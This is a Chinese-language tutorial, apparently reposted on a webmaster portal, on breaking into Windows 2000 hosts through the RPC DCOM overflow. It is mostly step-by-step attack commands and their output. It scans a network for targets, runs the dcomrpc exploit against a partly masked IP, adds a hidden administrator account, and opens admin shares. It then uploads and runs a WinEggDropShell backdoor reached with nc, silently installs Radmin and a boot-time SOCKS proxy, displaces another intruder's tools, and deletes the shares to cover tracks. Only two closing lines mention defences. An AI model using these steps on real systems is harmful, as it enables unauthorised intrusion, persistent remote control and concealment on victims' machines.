dcomrpc入侵
2022-9-26 10:54|
查看: 2228
|來源: 互聯(lián)網(wǎng)
需要的工具:
很好的:?radmin.exe
掃描工具: retinarpcdcom.exe
溢出攻擊工具:RpcDcom(通用溢出工具)
腳本開啟telnet工具:telnet.vbe opentelnet.exe resumetelnet.exe
代理:sksockser
需要的工具:
很好的:?radmin.exe
掃描工具: retinarpcdcom.exe
溢出攻擊工具:RpcDcom(通用溢出工具)
腳本開啟telnet工具:telnet.vbe opentelnet.exe resumetelnet.exe
代理:sksockserver.exe
后門程序:WinEggDropShellPro3thVersion
好了,該做的都做的差不多了。現(xiàn)在開始把~~
首先使用retinarpcdcom.exe掃描一個(gè)網(wǎng)段。查找有rpc漏洞的機(jī)子,這個(gè)漏洞需要135端口開放,(想必
隨便掃一下就會(huì)發(fā)現(xiàn)有許多主機(jī)開放的135端口)。。。。。。
(人走運(yùn)座著都能檢到錢) 211.217.50.xx?第一個(gè)主機(jī)就被掃出來又此漏洞。開始工作
看看211.217.50.xx有沒有其他的漏洞或是若口令之類的.我們可以使用流光掃描一下, 好了..看樣子沒有
其他的缺陷,主機(jī)開了3389端口,我們可以上去看一下是xp版本還是win2k
哈哈,是win2k server版本
展開命令行:
[查看dcomrpc的用法?用法 dcomrpc -d [options]? ]
F:\hack>cd rpc\dcomrpc
RPC DCOM Expl01t coded by .:[oc192.us]:. Security
Complied and Modified by Expl01t www.longker.com
Usage:
dcomrpc -d [options]
Options:
? -d:????Hostname to attack [Required]
? -t:????Type [Default: 0]
? -r:????Return address [Default: Selected from target]
? -p:????Attack port [Default: 135]
? -l:????Bindshell port [Default: 666]
Types:
? 0 [0x0018759f]: [Win2k-Universal]
? 1 [0x0100139d]: [WinXP-Universal]
開始進(jìn)行溢出:
F:\hack>cd rpc\dcomrpc -d?211.217.50.xx 0
RPC DCOM remote expl01t - .:[oc192.us]:. Security
Complied and recorrected by Expl01t www.longker.com
[ ] Resolving host..
[ ] Done.
[ ] Expl01ting....Just wait......
等到出現(xiàn),說明溢出成功
c:\winnt\system32>
接著我們建立用戶
c:\winnt\system32>net user blueye$Content$nbsp;1111 /add
命令成功完成。
把用戶添加成超級管理員
c:\winnt\system32>net localgroup administrators blueye$Content$nbsp;/add
命令成功完成。
看看共享開了沒有,沒有的話把共享開開
c:\winnt\system32>net share
清單是空的。
c:\winnt\system32>net share ipc$Content$nbsp;
命令成功完成。
c:\winnt\system32>net share admin$Content$nbsp;
命令成功完成。
到這里我們?nèi)肭指嬉欢温?
[ 建 立 IPC$Content$nbsp;連 接 ,也可以使用tftp上傳 ,先和對方建立連接]
F:\hack>net use \\211.217.50.xx\ipc$Content$nbsp;"1111" /user:blueye$Content$nbsp;
[ 上 傳 一 個(gè) 后 門 程 序 到 對 方 的 主 機(jī) 里]
F:\hack>copy d:\inject.exe \\211.217.50.xx\admin$\system32
F:\hack>copy d:\tback.dll \\211.217.50.xx\admin$\system32
然后運(yùn)行后門程序,我們可以使用at命令。但是有的機(jī)器把a(bǔ)t明令禁止了,建議直接開起telnet
使用opentelnet.exe? 關(guān)閉開啟的telnet使用resumetelnet \\ip user password
如果忘記開共享可以使用腳本開啟telnet來開共享,用法:
cscript telnet.vbe ip user password null port? (null是驗(yàn)證方式)
F:\hack>opentenet \\211.217.50.xx blueye$Content$nbsp;1111 1 4567
F:\hack>telnet 211.217.50.xx 4567
省略...
連接并運(yùn)行后門程序,運(yùn)行后門程序命令?根目錄:inject.exe -run
(后門使用方法和安裝都在zip文件里面包含了)
后門端口123456
F:\hack>nc 211.217.50.xx 123456
???????Welcome To WinEggDropShell Matrix Version
[Melody�]#
下面安裝radmin
配置好的radmin客戶端有4個(gè)文件。配置radmin客戶端可參考相關(guān)文章
radmin.reg
raddrv.dll
admdll.dll
r_server.exe
把這個(gè)4個(gè)文件copy c:\winnt\system32
在目錄下面執(zhí)行命令
c:\winnt\system32>r_server /s radmin.reg? -----導(dǎo)入注冊表
c:\winnt\system32>r_server /install /silence -----安裝radmin.并且不顯示托盤
c:\winnt\system32>net start r_server?----- 啟動(dòng)服務(wù)
可以開啟3389的話你自己看著辦把,哈哈
安裝sock代理
把sksockserver.exe copy c:\winnt\system32
c:\winnt\system32>sksockserver /install?????????-----安裝服務(wù)
c:\winnt\system32>sksockserver -config port 1234?????----端口定在1234?自己可以改
c:\winnt\system32>sksockserver -config starttype 2????----開機(jī)自動(dòng)啟動(dòng)
c:\winnt\system32>net start skserver??????????? ----啟動(dòng)服務(wù)
最后刪除共享
net share ipc$Content$nbsp;/del
net share admin$Content$nbsp;/del
在安裝radmin的時(shí)候你發(fā)現(xiàn)有人已經(jīng)安裝了。。怎么辦?走人?--------NO
看操作? (我輸入的內(nèi)容)
后門連接
F:\hack>nc 211.217.50.xx 123456
???????Welcome To WinEggDropShell Matrix Version
[Melody�]#(pslist)
[Melody�]#(pskill r_server)
[Melody�]#(shell)
c:\winnt\system32>(del r_server.exe)
c:\winnt\system32>(del admdll.dll)
c:\winnt\system32>(del raddrv.dll)
copy你自己的上去,然后安裝
省事的辦法直接導(dǎo)入注冊表,然后重新輸入安裝命令運(yùn)行,就可以了,只是在原來默認(rèn)端口上面架上了密
碼
等等。。。。為什么我輸入導(dǎo)入注冊表命令不管用呢?出現(xiàn)什么regedit不是可運(yùn)行的程序之類的 。
完了,努力白費(fèi)了。。。。。。。 -----------------------------NO
出現(xiàn)這樣的情況最簡單的解決辦法telnet上去導(dǎo)入試試看,什么?不是把,有沒有搞錯(cuò)阿。。。
呵呵,盡管放心,去試試看就知道;還可以先運(yùn)行radmin 然后在radmin的dos下導(dǎo)入,也是可以的
嗬嗬,去試試看吧
防御辦法:
安裝rpc補(bǔ)丁
使用防火墻過濾135,445,139等端口
|
本文最后更新于 2022-9-26 10:54,某些文章具有時(shí)效性,若有錯(cuò)誤或已失效,請?jiān)诰W(wǎng)站留言或聯(lián)系站長:[email protected]
·END·
站長網(wǎng)微信號:w17tui,關(guān)注站長、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營銷服務(wù)中心
免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識,文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請勿用于商業(yè)用途,如果損害了您的權(quán)利,請聯(lián)系我們及時(shí)修正或刪除。謝謝!
始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級,為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!
掃一掃,關(guān)注站長網(wǎng)微信
廣告、內(nèi)容合作請點(diǎn)這里: 尋求報(bào)道
